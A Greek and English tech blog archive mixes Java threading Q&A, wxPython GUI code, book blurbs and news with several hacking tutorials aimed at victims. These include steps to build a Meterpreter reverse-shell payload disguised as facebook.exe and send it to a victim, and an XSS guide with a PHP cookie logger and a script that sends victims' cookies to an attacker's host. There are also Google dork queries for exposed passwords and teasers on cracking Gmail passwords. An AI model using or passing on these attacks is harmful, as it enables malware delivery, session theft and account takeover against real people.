Social Icons

.

Πέμπτη 26 Δεκεμβρίου 2013

10 Most Commonly Asked Questions About Multi Threading For Java Developers

Java, multithreading, synchronised methods, Java methods, Java concepts, Java Q&A, Java tips, programming tutorials, Java programming, tech news, news


1. What is synchronisation in respect to multi-threading in Java?

This is the power to control access to multiple threads to shared resources. Without proper synchronisation, one Java thread may modify a shared variable while another thread may still be using it. This would in turn lead to errors and glitches in a program.

2. Explain different ways of using threads?

Java threads can be implemented using runnable interfaces or by extending the thread class itself. Of the two methods, the runnable interface is considered to be more advantageous, when the programmer is going with multiple inheritance.

3. Difference between Thread.start() & Thread.run() method?

The thread.start() method is a native method that runs the thread.run() method. Calling the thread.run() method will execute it in the same thread, which defeats the purpose of creating a new thread.

4. Why do we need run() & start() method both? Can it be achieved by only the run method?

The run() and start() methods are both needed for the Java Virtual Machine (JVM) to create a separate thread that can not be differentiated from normal method calls. This is the task performed by the start() method, which has to be called explicitly. The other advantage of having these two methods is that the programmer can run any object as a thread if it is implementing a runnable interface. This solves the multiple inheritance problems that you may face with Java.

5. What is ThreadLocal class? How can it be used?

The following points about ThreadLocal variables should help:

- This variable gives a separate copy of its value to each thread that is using it.
- These variable are usually static fields in the classes that want to work with the thread.
- When multiple threads access the instance, each gets its own copy of the variable.
- The ThreadLocal variable is often used in the DAO pattern. In this, the DAO class can be kept as a singleton, but the database connection can be maintained for each thread separately. This is called Per Thread Singleton.

6. When InvalidMonitorStateException is thrown? Why?

The InvalidMonitorStateException is thrown when the user tries to call the wait(), notify() or notifyAll() methods for an Object. The Object needs to call the method(s) from a place in the program where you do not have a lock on the object. This means that you do not have a synchronised block or method of the object but are still trying to call the notify(), wait() or notifyAll() methods. They all throw the same IllegalMonitorStateException exception. The exception is a subclass of the RuntimeException.

7. What is the difference between sleep(), suspend() and wait()?

The sleep() method takes the currently running thread to the Not Runnable state for a specified amount of time. A sleeping thread can not be entered by another thread and if a thread is running a synchronised block or method when it is put to sleep, then no other thread will be able to call this block or method either. A sleeping thread can be woken up by a thread calling t.interrupt on it. Sleep() will always affect the current thread since it is a static method.

Suspend() on the other hand is a deprecated method. It sends a thread into suspended state, which means that it keeps all its monitors and can not be interrupted. It has been deprecated since it may cause deadlocks.

The wait() method also puts the current thread into the Not Runnable mode but it is invoked on a locked object and not a thread.

Here is the sequence of operations you can think

- A thread X is running a synchronised block with a lock on object A
- Another thread Y comes to execute the synchronized block and finds that it’s already acquired.
- Now Y calls A.wait() method for waiting on the lock to be released the X thread.
- X thread finishes all its synchronised block work.
- X thread calls A.notifyAll() to notify all waiting threads that its done using the lock.
- Since Y thread is first in the queue of waiting it acquires the lock and starts processing.

8. What happens when a static method is made synchronised?

When a thread enters a synchronised static method, the class itself will get locked by the thread monitor. This is because synchronised static methods have a lock on the class they are in. So, no other thread can enter the synchronised static methods in that class anymore.

9. Can a thread call a non-synchronized instance method of an Object when a synchronised method is being executed?

Yes, non synchronised instance methods can be called always and no lock object check is performed for such methods. In fact, the method is called even when it is not declared if you are working with shared data.

That is why it is important to be careful while working with this. You declare a method as synchronised based on the critical section access. If a method does not access a critical section, then it doesn’t need to be a synchronised method.

10. What is a deadlock?

If two or more threads have been blocked forever, they are said to be in a deadlock and waiting for each other. This usually happens when the two threads, each of which has a lock on one resource, tries to get a lock on the others’ resource.

The most common causes are:

- When two threads call Thread.join() on each other.
- When two threads use nested synchronised blocks to lock two objects and the blocks lock the same objects in different order.

Source: Fromdev.com

Hack Remote PC using Payload in BackTrack5


Open Your Backtrack terminal and Type cd /
pentest/exploits/set
Now Open Social Engineering Toolkit (SET)./
set
Now choose option 1 , “Social-Engineering
Attacks ”Now choose option 4 , “Create
Payload and Listener”
Now choose 2 “ Windows Reverse_TCP
Meterpreter ”, but you have several to choose
from including your ownprogram.
Now choose 2 “ shikata-ga-nai ”Now choose a
port for the listener, choose a random port 443
a
nd then I choose Yes on starting a listener.
Now a file name msf.exe has been created, you
can get the file by going on file system–
>pentest>exploit–>set–>msf.exe
Now rename the file anything you want. In my
case I amrenaming it facebook.exe Now upload
your exe on file sharing website like
filesonic,rapidshare, and megaupload. In my
case I am using 4shared now send link to the
victim.
As soon as our victim downloads and executes
our facebook.exe, now you have access to the
victims PC
Use “Sessions -l ” and the Session number to
connect to the session. Now Type “session s -i
ID “

Δευτέρα 25 Νοεμβρίου 2013

Create Media Players With Python!


import wx


class Example(wx.Frame):
           
    def __init__(self, *args, **kw):
        super(Example, self).__init__(*args, **kw) 
        
        self.InitUI()
        
    def InitUI(self):   

        self.CreateMenuBar()
    
        panel = wx.Panel(self)

        pnl1 = wx.Panel(self)
        pnl1.SetBackgroundColour(wx.BLACK)
        pnl2 = wx.Panel(self)        

        slider1 = wx.Slider(pnl2, value=18, minValue=0, maxValue=1000)
        pause = wx.BitmapButton(pnl2, bitmap=wx.Bitmap('pause.png'))
        play  = wx.BitmapButton(pnl2, bitmap=wx.Bitmap('play.png'))
        forw  = wx.BitmapButton(pnl2, bitmap=wx.Bitmap('forw.png'))
        back  = wx.BitmapButton(pnl2, bitmap=wx.Bitmap('back.png'))
        vol = wx.BitmapButton(pnl2, bitmap=wx.Bitmap('volume.png'))
        slider2 = wx.Slider(pnl2, value=1, minValue=0, maxValue=100, 
            size=(120, -1))

        vbox = wx.BoxSizer(wx.VERTICAL)
        hbox1 = wx.BoxSizer(wx.HORIZONTAL)
        hbox2 = wx.BoxSizer(wx.HORIZONTAL)

        hbox1.Add(slider1, proportion=1)
        hbox2.Add(pause)
        hbox2.Add(play, flag=wx.RIGHT, border=5)
        hbox2.Add(forw, flag=wx.LEFT, border=5)
        hbox2.Add(back)
        hbox2.Add((-1, -1), proportion=1)
        hbox2.Add(vol)
        hbox2.Add(slider2, flag=wx.TOP|wx.LEFT, border=5)

        vbox.Add(hbox1, flag=wx.EXPAND|wx.BOTTOM, border=10)
        vbox.Add(hbox2, proportion=1, flag=wx.EXPAND)
        pnl2.SetSizer(vbox)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(pnl1, proportion=1, flag=wx.EXPAND)
        sizer.Add(pnl2, flag=wx.EXPAND|wx.BOTTOM|wx.TOP, border=10)

        self.SetMinSize((350, 300))
        self.CreateStatusBar()
        self.SetSizer(sizer)

        self.SetSize((350, 200))
        self.SetTitle('Harsha Player')
        self.Centre()
        self.Show(True)          
        
    def CreateMenuBar(self):
        
        menubar = wx.MenuBar()
        filem = wx.Menu()
        play = wx.Menu()
        view = wx.Menu()
        tools = wx.Menu()
        favorites = wx.Menu()
        help = wx.Menu()
        
        filem.Append(wx.ID_ANY, '&quit', 'Quit application')

        menubar.Append(filem, '&File')
        menubar.Append(play, '&Play')
        menubar.Append(view, '&View')
        menubar.Append(tools, '&Tools')
        menubar.Append(favorites, 'F&avorites')
        menubar.Append(help, '&Help')

        self.SetMenuBar(menubar)        
                      
def main():
    
    ex = wx.App()
    Example(None)
    ex.MainLoop()    

if __name__ == '__main__':
    main()          

Δημιουργήστε τον δικό σας Web Browser στην Python!


import wx
from wx.lib.buttons import GenBitmapTextButton

class Browser(wx.Frame):
    def __init__(self, parent, id, title):
        wx.Frame.__init__(self, parent, id, title, size=(650, 600))
        panel = wx.Panel(self, -1)
        panel.SetBackgroundColour('WHITE')

        menubar = wx.MenuBar()
        file = wx.Menu()
        file.Append(1, '&Quit', '')
        edit = wx.Menu()
        view = wx.Menu()
        go = wx.Menu()
        bookmarks = wx.Menu()
        tools = wx.Menu()
        help = wx.Menu()

        menubar.Append(file, '&File')
        menubar.Append(edit, '&Edit')
        menubar.Append(view, '&View')
        menubar.Append(go, '&Go')
        menubar.Append(bookmarks, '&Bookmarks')
        menubar.Append(tools, '&Tools')
        menubar.Append(help, '&Help')

        self.SetMenuBar(menubar)

        vbox = wx.BoxSizer(wx.VERTICAL)
        hbox1 = wx.BoxSizer(wx.HORIZONTAL)
        hbox2 = wx.BoxSizer(wx.HORIZONTAL)
        toolbar1 = wx.Panel(panel, -1, size=(-1, 40))
        back = wx.BitmapButton(toolbar1, -1, wx.Bitmap('icons/back.png'), 
  style=wx.NO_BORDER)
        forward = wx.BitmapButton(toolbar1, -1, wx.Bitmap('icons/forward.png'), 
  style=wx.NO_BORDER)
        refresh = wx.BitmapButton(toolbar1, -1, wx.Bitmap('icons/refresh.png'), 
  style=wx.NO_BORDER)
        stop = wx.BitmapButton(toolbar1, -1, wx.Bitmap('icons/stop.png'), 
  style=wx.NO_BORDER)
        home = wx.BitmapButton(toolbar1, -1, wx.Bitmap('icons/home.png'), 
  style=wx.NO_BORDER)
        address = wx.ComboBox(toolbar1, -1, size=(50, -1))
        go = wx.BitmapButton(toolbar1, -1, wx.Bitmap('icons/go.png'), 
  style=wx.NO_BORDER)
        text = wx.TextCtrl(toolbar1, -1, size=(150, -1))

        hbox1.Add(back)
        hbox1.Add(forward)
        hbox1.Add(refresh)
        hbox1.Add(stop)
        hbox1.Add(home)
        hbox1.Add(address, 1, wx.TOP, 4)
        hbox1.Add(go, 0, wx.TOP | wx.LEFT, 4)
        hbox1.Add(text, 0, wx.TOP | wx.RIGHT, 4)

        vbox.Add(toolbar1, 0, wx.EXPAND)
        line = wx.StaticLine(panel)
        vbox.Add(line, 0, wx.EXPAND)

        toolbar2 = wx.Panel(panel, -1, size=(-1, 30))
        bookmark1 = wx.BitmapButton(toolbar2, -1, wx.Bitmap('icons/love.png'), 
  style=wx.NO_BORDER)
        bookmark2 = wx.BitmapButton(toolbar2, -1, wx.Bitmap('icons/books.png'), 
  style=wx.NO_BORDER)
        bookmark3 = wx.BitmapButton(toolbar2, -1, wx.Bitmap('icons/sound.png'), 
  style=wx.NO_BORDER)
        hbox2.Add(bookmark1, flag=wx.RIGHT, border=5)
        hbox2.Add(bookmark2, flag=wx.RIGHT, border=5)
        hbox2.Add(bookmark3)
        toolbar2.SetSizer(hbox2)
        vbox.Add(toolbar2, 0, wx.EXPAND)
        line = wx.StaticLine(panel)
        vbox.Add(line, 0, wx.EXPAND)

        panel.SetSizer(vbox)

        self.CreateStatusBar()
        self.Centre()
        self.Show(True)

app = wx.App(0)
Browser(None, -1, 'Harsha Browser')
app.MainLoop()

Linked List Operations (C Program)

 
#include<dos.h>
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
#define ESC 27
#define DISPOFFX 50
#define DISPOFFY 2
#define ENDOFX 80
#define ENDOFY 25
#define SPACING 1
#define INTLENGHT 6
#define MIN 0
#define MAX 1
#define TRUE 1
#define FALSE 0
#define ASCENDING 1
#define DESCENDING 2
struct linked_list
{
 int data;
 struct linked_list *link;
}*start;
typedef struct linked_list node;
int count=0,*posa=NULL;
struct display_flags
{
 unsigned int disp_list:1;
 unsigned int anim:1;
 unsigned int delay_time:12;
 unsigned int spacing:2;
}flag;
int srch(int);
int check(int);
int bubble(void);
int selection(void);
int insertion(void);
int posof(int,int);
void add(void);
void del(void);
void sort(int);
void swap(int);
void disp(void);
void move(void);
void flush(int);
void rotate(void);
void options(void);
void reverse(void);
node * gotopos(int);

Πέμπτη 21 Νοεμβρίου 2013

SQL Injection Attacks and Defense


"SQL injection is probably the number one problem for any server-side application, and this book unequaled in its coverage." -Richard Bejtlich, Tao Security blog

SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because there is no central repository of information available for penetration testers, IT security consultants and practitioners, and web/software developers to turn to for help.

SQL Injection Attacks and Defense, Second Edition is the only book devoted exclusively to this long-established but recently growing threat. This is the definitive resource for understanding, finding, exploiting, and defending against this increasingly popular and particularly destructive type of Internet-based attack.

SQL Injection Attacks and Defense, Second Edition includes all the currently known information about these attacks and significant insight from its team of SQL injection experts, who tell you about:

Understanding SQL Injection - Understand what it is and how it works
Find, confirm and automate SQL injection discovery
Tips and tricks for finding SQL injection within code
Create exploits for using SQL injection
Design apps to avoid the dangers these attacks
SQL injection on different databases
SQL injection on different technologies
SQL injection testing techniques
Case Studies

Securing SQL Server, Second Edition is the only book to provide a complete understanding of SQL injection, from the basics of vulnerability to discovery, exploitation, prevention, and mitigation measures.
Covers unique, publicly unavailable information, by technical experts in such areas as Oracle, Microsoft SQL Server, and MySQL---including new developments for Microsoft SQL Server 2012 (Denali).
Written by an established expert, author, and speaker in the field, with contributions from a team of equally renowned creators of SQL injection tools, applications, and educational materials.


Δευτέρα 18 Νοεμβρίου 2013

"Επίθεση" από τους Anonymous στο Ισραήλ

Επίθεση από τους Anonymous στο Ισραήλ

Μαζική επίθεση στα συστήματα πληροφορικής δέχεται από χθες το Ισραήλ, αλλά έχει καταφέρει προς το παρόν να περιορίσει τις ζημιές χάρη στην καλή προετοιμασία, διαβεβαίωσε ένας από τους εγκυρότερους ισραηλινούς ειδικούς στην πληροφορική.


Η οργάνωση «πειρατών» της πληροφορικής Anonymous ανακοίνωσε το Σάββατο ότι θα πραγματοποιήσει σήμερα μια μεγάλη επίθεση στους ισραηλινούς ιστότοπους με στόχο «να σβήσει το Ισραήλ από τον κυβερνοχώρο», σε αλληλεγγύη με τον παλαιστινιακό λαό.

Ωστόσο, σήμερα το πρωί οι ζημιές ήταν «λίγο-πολύ ανύπαρκτες», όπως διαβεβαίωσε στο ραδιοσταθμό του στρατού ο καθηγητής Ιτζχάκ μπεν Ίσραελ, ιδρυτής ενός εθνικού κέντρου κατά εγκληματικότητας στον κυβερνοχώρο, το οποίο εξαρτάται από το γραφείο του πρωθυπουργού Μπενιαμίν Νετανιάχου.

Η επίθεση έπληξε ιδιαίτερα τους ιστότοπους του πρωθυπουργού, των υπουργείων Άμυνας και Παιδείας, καθώς και τη Στατιστική Υπηρεσία, αλλά όλοι αυτοί οι ιστότοποι φαίνεται σήμερα ότι λειτουργούν φυσιολογικά.

«Η χώρα ήταν καλύτερα προετοιμασμένη απ' ό,τι πριν από ένα χρόνο, κατά τη διάρκεια ενός κύματος επιθέσεων εναντίον του Χρηματιστηρίου και της (αεροπορικής εταιρείας) El Al και άλλων ιστότοπων. Αυτή τη φορά η επίθεση είναι πιο μαζική και πιο έντονη, αλλά είμαστε καλύτερα προετοιμασμένοι», δήλωσε Μπεν Ίσραελ, αναφερόμενος σε επίθεση που είχε πραγματοποιηθεί στις αρχές του 2012.

Σάββατο 16 Νοεμβρίου 2013

Python Cookbook


Description:
Portable, powerful, and a breeze to use, Python is the popular open source object-oriented programming language used for both standalone programs and scripting applications. It is now being used by an increasing number of major organizations, including NASA and Google. Updated for Python 2.4, The Python Cookbook, 2nd Edition offers a wealth of useful code for all Python programmers, not just advanced practitioners. Like its predecessor, the new edition provides solutions to problems that Python programmers face everyday.


Linux Server Hacks


Linux Server Hacks is a collection of 100 industrial-strength hacks, providing tips and tools that solve practical problems for Linux system administrators. Every hack can be read in just a few minutes but will save hours of searching for the right answer. Some of the hacks are subtle, many of them are non-obvious, and all of them demonstrate the power and flexibility of a Linux system. You'll find hacks devoted to tuning the Linux kernel to make your system run more efficiently, as well as using CVS or RCS to track the revision to system files. You'll learn alternative ways to do backups, how to use system monitoring tools to track system performance and a variety of secure networking solutions. Linux Server Hacks also helps you manage large-scale Web installations running Apache, MySQL, and other open source tools that are typically part of a Linux system.


C4droid: Download Free C/C++ Compiler for Android Platform


In this post i am giving you link to download C4droid, a free c/c++ compiler for android platform. It is very easy to understand and use. By default you will be able to write and run c programs. But for c++ programs you need to download the required plugin from play store. At first when you will open the app it will extract and will ask you you to install the gcc plugin, so install it from google play store. Now download it, install it and share your queries and experience.


Παρασκευή 15 Νοεμβρίου 2013

How To: Crack A Password-Protected Website

In this tutorial, I am going to teach you how to crack a password-protected website. To perform the attack, we are going to use the Hydra password cracking utility, which will allow us to brute force both the username and the password.

How To: Crack a Gmail Account Password In BackTrack 5

In this tutorial, I will teach you how to crack a Gmail user’s password with a brute force attack. To perform the attack, we will be using a script called Hydra, which comes preinstalled on your BackTrack 5 distribution bundle. The attack is simple; all we need is an email address for our victim and a wordlist or dictionary file. For those of you who don’t know how to create a wordlist.

Πέμπτη 14 Νοεμβρίου 2013

Πώς η NSA «έσπασε» την κρυπτογραφημένη γλυπτική της CIA

Το περίφημο κρυπτογραφημένο άγαλμα που βρίσκεται στο αρχηγείο της CIA στο Λάνγκλεϊ της Βιρτζίνια από το 1990, το φοβερό και τρομερό Kryptos, δεν χρειάζεται ιδιαίτερες συστάσεις... Αυτό που χρειάστηκε ωστόσο ήταν περισσότερο από 8 χρόνια για έναν αναλυτή της CIA και έναν πληροφορικό από την Καλιφόρνια για να καταφέρουν να διαβάσουν τα 3 από τα 4 κωδικοποιημένα μηνύματα του γλυπτού στα τέλη της δεκαετίας του '90!

Κανείς από τους δύο αναλυτές δεν γνώριζε ωστόσο ότι η δόξα τους έμελλε να αρπαχτεί από μια μικρή ομάδα ερευνητών της NSA, οι οποίοι αποκωδικοποίησαν τα ίδια τρία τμήματα του Kryptos χρόνια πρωτύτερα, και μάλιστα το κατάφεραν σε λιγότερο από έναν μήνα(!), όπως αποδεικνύουν απόρρητα έγγραφα της Υπηρεσίας Εθνικής Ασφαλείας των ΗΠΑ που ήρθαν πρόσφατα στο φως.
Κι αν σήμερα η NSA τρέχει να προλάβει τη δημόσια κατακραυγή για την παρακολούθηση αμερικανών πολιτών αλλά και ξένων αποστολών, το «σπάσιμο» του Kryptos αποδεικνύει τις ήρεμες μέρες που περνούσαν τα μέλη της υπηρεσίας στην περίοδο που μεσολάβησε από το τέλος του Ψυχρού Πολέμου μέχρι και το τρομοκρατικό χτύπημα της 11ης Σεπτεμβρίου.

Η δημοφιλής ιστορία του Kryptos λέει λοιπόν ότι ο αναλυτής της CIA, David Stein, ήταν ο πρώτος που κατάφερε να σπάσει το άβατο του κώδικα στα τρία από τα τέσσερα κρυπτογραφημένα τμήματα του αγάλματος το 1998. Ο Stein περνούσε τα διαλείμματα για φαγητό προσπαθώντας να διαβάσει τα μηνύματα και του χρειάστηκαν 400 περίπου ώρες για να σπάσει τον κώδικα, με μόνη βοήθεια το μολύβι και το χαρτί του, κερδίζοντας κατά κράτος τους άλλους αναλυτές της Κεντρικής Υπηρεσίας Πληροφοριών των ΗΠΑ που είχαν επιδοθεί στον ίδιο αγώνα.

Το κατόρθωμα του Stein παρέμεινε ωστόσο κρυφό: το 1999 έγραψε ένα συναρπαστικό εσωτερικό σημείωμα περιγράφοντας τον άθλο του, το οποίο κυκλοφόρησε μεν στο αρχηγείο της CIA, για τα μάτια του κοινού παρέμεινε ωστόσο απόρρητο.

Νέος μανδύας αορατότητας από Έλληνα επιστήμονα

Έναν νέο μανδύα αορατότητας που εξαφανίζει αντικείμενα από τα ραντάρ ανέπτυξε ο Δρ. Γιώργος Ελευθεριάδης, καθηγητής υπολογιστικής μηχανικής στο πανεπιστήμιο του Τορόντο, και ο διδακτορικός φοιτητής Michael Selvanayagam.
Για να εξαφανίσουν ένα αντικείμενο από τον ραδιοεντοπιστή (ραντάρ), οι επιστήμονες το περιβάλλουν με μικροσκοπικές κεραίες που εκπέμπουν ένα ηλεκτρομαγνητικό πεδίο.
Το πεδίο που εκπέμπεται εξουδετερώνει τα κύματα που ανακλώνται από το αντικείμενο, καθιστώντας το αόρατο.
Η τεχνολογία μπορεί να χρησιμοποιηθεί για στρατιωτικούς σκοπούς, αλλά και για να εξαφανίσει δομές και αντικείμενα που εμποδίζουν τη μετάδοση των σημάτων κινητής τηλεφωνίας.
Όπως εξηγούν οι δυο ερευνητές, που συνεργάζονται για την ανάπτυξη λειτουργικού μανδύα αορατότητας από το 2006, περιβάλλοντας τη δομή με μικροσκοπικές κεραίες, τα σήματα κινητής τηλεφωνίας μεταδίδονται ελεύθερα.
Σημειώνεται ότι ο νέος μανδύας δεν καθιστά ένα αντικείμενο αόρατο στους ανθρώπους, αλλά το εξαφανίζει από τα ραντάρ.

Αν και μέχρι πρότινος οι μανδύες αορατότητας θεωρούνταν ότι ενέπιπταν στο πεδίο της επιστημονικής φαντασίας, οι επιστήμονες πλέον πιστεύουν ότι δεν πρόκειται για άπιαστο όνειρο αλλά για κάτι εφικτό.
«Είναι πολύ απλό: αντί να περιβάλλουμε αυτό που προσπαθούμε να κρύψουμε με ένα παχύ κέλυφος μεταϋλικού, εμείς το περικυκλώνουμε με ένα στρώμα από μικροσκοπικές κεραίες, το οποίο εκπέμπει ένα πεδίο που εξουδετερώνει τις ανακλάσεις από το αντικείμενο», εξήγησε ο Έλληνας καθηγητής.
Το σύστημα που ανέπτυξαν οι δυο επιστήμονες μπορεί επίσης να μεταβάλλει τη «ραδιοκυματική υπογραφή» ενός αντικειμένου, κάνοντάς το να φαίνεται μεγαλύτερο, μικρότερο ή ακόμα και σε διαφορετική θέση.
Όπως προαναφέρθηκε ο πρωτοποριακός μανδύας αορατότητας έχει σημαντικές χρήσεις στις ένοπλες δυνάμεις, από τις επιχειρήσεις παρακολούθησης ως την «εξαφάνιση» στρατιωτικών οχημάτων, και οι δυο επιστήμονες βρίσκονται ήδη σε συζητήσεις με τον καναδικό στρατό για την εφαρμογή της τεχνολογίας τους.

Backtrack 5: Metasploit attack on Windows 7 32 and 64 bit

Πέμπτη 15 Αυγούστου 2013

Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS

Ένας τρόπος για να μπορέσουμε να βρούμε τους κωδικούς χρηστών από κάποια ιστοσελίδα είναι μέσω Cross Site Scripting (XSS).Θα πρέπει φυσικά η ιστοσελίδα να είναι vulnerable σε αυτού τους είδους τις επιθέσεις.Για να βρούμε ποιές ιστοσελίδες παρουσιάζουν αυτού του είδους την αδυναμία αρκεί να χρησιμοποιήσουμε το πρόγραμμα Acunetix Vulnerability Scanner.
Ποιά εργαλεία θα χρειαστούμε?
Μόλις βρούμε τον στόχο μας τότε θα χρειαστούμε τα ακόλουθα:
  1. Έναν λογαριασμό σε ένα hosting site
  2. 2 σελίδες με κώδικα php
  3. Την ιστοσελίδα που είναι vulnerable
Μπορούμε να βρούμε αρκετά hosting sites που υποστηρίζουν php όπως:
www.000webhost.com
http://www.free-webhosts.com/free-php-webhosting.php
Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther</title>
</head>

<body bgcolor=”#C0C0C0″>
<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”>&nbsp;</p>

</body>
και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];
$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:  “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(“Location:
http://www.google.com“);
?>
Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.
Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:
http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=”http://www.example-of-hosting/documents.php?c=”+document.cookie;</script>
Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php

Βρίσκοντας ευάλωτες ιστοσελίδες με το Google

Παλαιότερα όταν κάποιος έψαχνε στην μηχανή αναζήτησης Google με συγκεκριμένα queries αυτήν στα αποτελέσματα της μπορούσε να εμφανίσει σημαντικές πληροφορίες όπως passwords από Admins,mail passwords κτλ.Τα τελευταία χρόνια όμως έχουν σταματήσει να εμφανίζεις οι περισσότερες ”καλές” πληροφορίες για λόγους ασφαλείας κυριώς επειδή γίναν γνωστά όλα αυτά τα queries στο ευρύ κοινό.
Ωστόσο υπάρχει ακόμα περίπτωση να βρούμε στα αποτελέσματα του Google κάποιους κωδικούς,username κτλ.Τα queries που θα πρέπει να δώσουμε στην αναζήτηση του Google για να βρούμε τα περιεχόμενα φακέλων όπως admin,password,mail κτλ. είναι τα ακόλουθα:
“index of /admin”
index of /password”
“index of /mail”
“index of /”+passwd
“index of /” password.txt
Επίσης μπορούμε να δοκιμάσουμε και να ψάξουμε για password hints προκειμένου να έχουμε κάποια παραπάνω στοιχεία για να σπάσουμε κάποιον κωδικό.Οι λέξεις κλειδιά είναι οι παρακάτω:
password hint
password hint -email
show password hint -email
filetype:htaccess user
Φυσικά όπως αναφέραμε και πιο πάνω είναι πλέον πολύ δύσκολο να εντοπίσουμε πάρα πολλά password αλλά έστω και για την μία φορά που θα βρούμε κάτι αξίζει η προσπάθεια.

Πώς βρίσκουμε το λειτουργικό σύστημα ενός υπολογιστή

Το να γνωρίζουμε το λειτουργικό σύστημα από κάποιο απομακρυσμένο μηχάνημα που θέλουμε να επιτεθούμε είναι ένα από τα βασικά στοιχεία και αυτό γιατί γνωρίζοντας το λειτουργικό που τρέχει μπορούμε να βρούμε πιο εύκολα και τις αδυναμίες του.
Ποιοί τρόποι υπάρχουν?
Υπάρχουνε αρκετοί τρόποι για να βρούμε το λειτουργικό σύστημα ενός μηχανήματος.Ο πιο απλός είναι μέσω banner-grabbing στον οποίο ουσιαστικά προσπαθούμε να συνδεθούμε σε κάποιες υπηρεσίες που τρέχει το μηχάνημα όπως FTP,Telnet,HTTP,SMTP κτλ. και από τις πληροφορίες που θα μας εμφανιστούν στην οθόνη μας ακόμα και αν δεν συνδεθούμε θα μπορέσουμε να καταλάβουμε αν τρέχει Windows,Linux κτλ.
Υπάρχει όμως και μία άλλη τεχνική για ανίχνευση του λειτουργικού συστήματος η οποία λέγεται Active Stack Fingerprinting.Η τεχνική αυτήν εστιάζει στο TCP/IP stack του κάθε λειτουργικού συστήματος το οποίο και διαφέρει από λειτουργικό σε λειτουργικό.Αλλιώς δηλαδή είναι το TCP/IP stack της Microsoft αλλιώς των MacOS και αλλιώς των Linux. 
Για να έχει αξιοπιστία η τεχνική αυτήν χρειάζεται να υπάρχει τουλάχιστον ένα ανοιχτό port στο απομακρυσμένο μηχάνημα.Διότι από τα services που τρέχουν και από τα ports που είναι ανοιχτά θα γίνει και ο εντοπισμός του λειτουργικού.
Από ποιά στοιχεία γίνεται η αναγνώριση του λειτουργικού?
Ουσιαστικά τα προγράμματα που είναι για ανίχνευση ενός λειτουργικού συστήματος καταλαβαίνουν το αν είναι Windows ή Linux ή MacOS από τις αποκρίσεις που πέρνουν όταν στέλουν διάφορα πακέτα.Πιο συγκεκριμένα εάν σταλεί ένα FIN πακέτο σε ένα ανοιχτό port και το λειτουργικό σύστημα αποκριθεί με ένα FIN/ACK τότε το πρόγραμμα που τρέχουμε για ανίχνευση καταλαβαίνει ότι πρόκειται για Windows λειτουργικό.Αναλύτικα η αναγνώριση ενός λειτουργικού γίνεται από τα εξής:
FIN
Bonus Flag
Initial Sequence Number (ISN)
Fragment bit
TCP Initial Window Size
ACK value
ICMP message quoting
ICMP error message quenching
ICMP error message – echoing integrity
TOS (Type of Service)
Fragmentation Handling
TCP Options
Ποιά εργαλεία θα χρειαστούμε?
Δύο είναι τα πιο ακριβή εργαλεία που μπορούν να εντοπίσουν το λειτουργικό σύστημα από ένα απομακρυσμένο host.Το ένα είναι το nmap και το άλλο είναι το queso.Το καλό με το nmap είναι ότι υποστηρίζεται από αρκετές πλατφόρμες (Windows,Linux,MacOS) σε αντίθεση με το queso που είναι μόνο για linux.Επίσης για όσους δεν γνωρίζουν τo nmap είναι ένα port scanner αλλά με δυνατότητα ανίχνευσης λειτουργικού συστήματος ενώ το queso είναι μόνο ένα εργαλείο για να εντοπίζει λειτουργικά συστήματα απομακρυσμένων host.
Που θα τα βρούμε?
Και τα δύο αυτά τα προγράμματα διατίθενται δωρεάν από τις ακόλουθες ιστοσελίδες.
Nmap:
http://nmap.org/download.html
Queso:
http://dir.filewatcher.com/d/OpenBSD/3.3/i386/queso-980922.tgz.15765.html
Πώς τα δουλεύουμε?
Η λειτουργία τους είναι αρκετά απλή.Το nmap στην τελευταία του έκδοση και για τους χρήστες Windows υποστηρίζει πλέον και GUI interface ενώ έχει και αρκετά καλό help file.Ωστόσο η εντολή σε περίπτωση που το τρέξουμε είτε από γραμμή εντολών είτε από Linux είναι η εξής:
nmap -O IP
ενώ για το queso πληκτρολογούμε το εξής:
[root] queso IP
Παράδειγμα:
Ανίχνευση του λειτουργικού από το nmap

Προστασία του site μας από scanner και bots

Αν διαθέτουμε κάποια ιστοσελίδα είναι πολύ πιθανόν ότι κάποια στιγμή κάποιος χρήστης μπορεί να χρησιμοποιήσει κάποιο scanner ή κάποιο bot προκειμένου να προσπαθήσει να ανακαλύψει τις αδυναμίες του site μας.
Το πρόβλημα
Πολλά κακόβουλα bots κρύβονται πίσω από ψεύτικα UA strings και αγνοούν εντελώς το αρχείο robots.txt.Οπότε ακόμα και αν έχουμε μπλοκάρει μερικά μέσω του αρχείου .htaccess κάποια είναι πιθανό να την παρακάμψουν αυτήν την προστασία χρησιμοποιώντας ονόματα από γνήσια user-agent. 
Επίσης ένα scanner ή ένα bot τραβάει από το bandwidth της ιστοσελίδας μας και αυτό μπορεί να έχει σαν επακόλουθο το site μας να αργεί να φορτώσει.
